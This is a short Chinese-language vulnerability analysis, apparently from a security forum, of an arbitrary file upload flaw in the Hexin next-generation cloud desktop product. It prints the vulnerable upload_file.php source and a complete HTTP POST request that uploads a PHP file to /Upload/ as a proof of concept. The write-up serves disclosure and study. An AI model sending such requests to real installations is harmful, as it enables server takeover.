和信下一代云桌面文件上传漏洞分析 - 图1

    安装好的目录结构,看到有个 Upload 进去看下
    upload_file.php

    3. 1.  `<?php`
    4. 2.  `function writeLog($msg){`
    5. 3.   `$logFile = date('Y-m-d').'.txt';`
    6. 4.   `$msg = date('Y-m-d H:i:s').' >>> '.$msg."\r\n";`
    7. 5.   `file_put_contents($logFile,$msg,FILE_APPEND );`
    8. 6.  `}`
    9. 7.  `//require("vesystem/msg_define/session_lib.php");`
    10. 8.  `if  ($_FILES["file"]["error"]  >  0)`
    11. 9.  `{`
    12. 10.   `//  echo "Return Code: " . $_FILES["file"]["error"] . "`
    13. 11.  `";`
    14. 12.  `}`
    15. 13.  `else`
    16. 14.  `{`
    17. 15.   `echo "_Requst:<br>";`
    18. 16.   `/*     foreach($_REQUEST as $name => $value)`
    19. 17.   `{`
    20. 18.   `$name."=".$value."<br>";`
    21. 19.   `}`
    22. 20.   `//echo "_FILES:<br>";`
    23. 21.   `foreach($_FILES as $array_name=>$array_value)`
    24. 22.   `{` 
    25. 23.   `$array_name."=".$array_value."<br>";`
    26. 24.   `foreach($_FILES[$array_name] as $name => $value)`
    27. 25.   `{`
    28. 26.   `$name."=".$value."<br>";`
    29. 27.   `}`
    30. 28.   `} */`
    31. 29.   `$l = $_GET['l'];`
    33. 31.   `//拆分字符串按“/”分割字符`
    34. 32.   `$arrpath = explode("/",$l);`
    35. 33.   `$m = count($arrpath);`
    37. 36.   `$file_e = "";`
    38. 37.   `if ($m>1){`
    39. 38.   `for($i=0;$i<$m;$i++){`
    40. 39.   `$file_e .= $arrpath[$i];`
    42. 42.   `if(!file_exists($file_e)){`
    43. 43.   `mkdir($file_e, 0777);`
    44. 44.   `}`
    45. 45.   `$file_e .= "/";`
    46. 46.   `}`
    48. 48.   `}else{`
    50. 50.   `//判断文件夹是否存在 ,不存在就新建个`
    52. 53.   `if(!file_exists($l)){`
    53. 54.   `mkdir("$l", 0777);`
    54. 55.   `}`
    55. 56.   `}`
    57. 60.   `$target_path=$_SERVER["DOCUMENT_ROOT"]."/Upload/".$l."/".$_FILES["file"]["name"];`
    59. 63.   `if (file_exists($target_path))`
    60. 64.   `{`
    61. 65.   `unl ink($target_path);`
    62. 66.   `}`
    64. 69.   `$a = 'old_file='.$_FILES["file"]["tmp_name"];`
    66. 71.   `writeLog($a);`
    67. 72.   `writeLog('new_file='.$target_path);`
    68. 73.   `$target_path = str_replace ( '//', '/', $target_path );`
    70. 75.   `writeLog('new_file2='.$target_path);`
    72. 77.   `$varerror =  move_uploaded_file($_FILES["file"]["tmp_name"],$target_path);`
    74. 79.   `writeLog('$varerror='.$varerror);`
    75. 80.  `}`
    76. 81.  `?>`

    直接就是任意文件上传,获取参数 l 然后上传的文件名路径为
    /Upload/“.和信下一代云桌面文件上传漏洞分析 - 图2_FILES[“file”][“name”]

    3. 1.  `POST /Upload/upload_file.php?l=1 HTTP/1.1`
    4. 2.  `Host:  127.0.0.1:2001`
    5. 3.  `User-Agent:  Mozilla/5.0  (Windows NT 10.0;  Win64; x64)  AppleWebKit/537.36  (KHTML, like Gecko)  Chrome/87.0.4280.141  Safari/537.36`
    6. 4.  `Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8`
    7. 5.  `Referer: http://127.0.0.1:2001/`
    8. 6.  `Accept-Encoding: gzip, deflate`
    9. 7.  `Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8`
    10. 8.  `Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6`
    11. 9.  `Connection: close`
    12. 10.  `Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv`
    13. 11.  `Content-Length:  164`
    15. 13.  `------WebKitFormBoundaryfcKRltGv`
    16. 14.  `Content-Disposition: form-data; name="file"; filename="1.php"`
    17. 15.  `Content-Type: image/avif`
    19. 17.  `<?php phpinfo();  ?>`
    20. 18.  `------WebKitFormBoundaryfcKRltGv--`

    和信下一代云桌面文件上传漏洞分析 - 图3

    和信下一代云桌面文件上传漏洞分析 - 图4

    https://forum.butian.net/share/80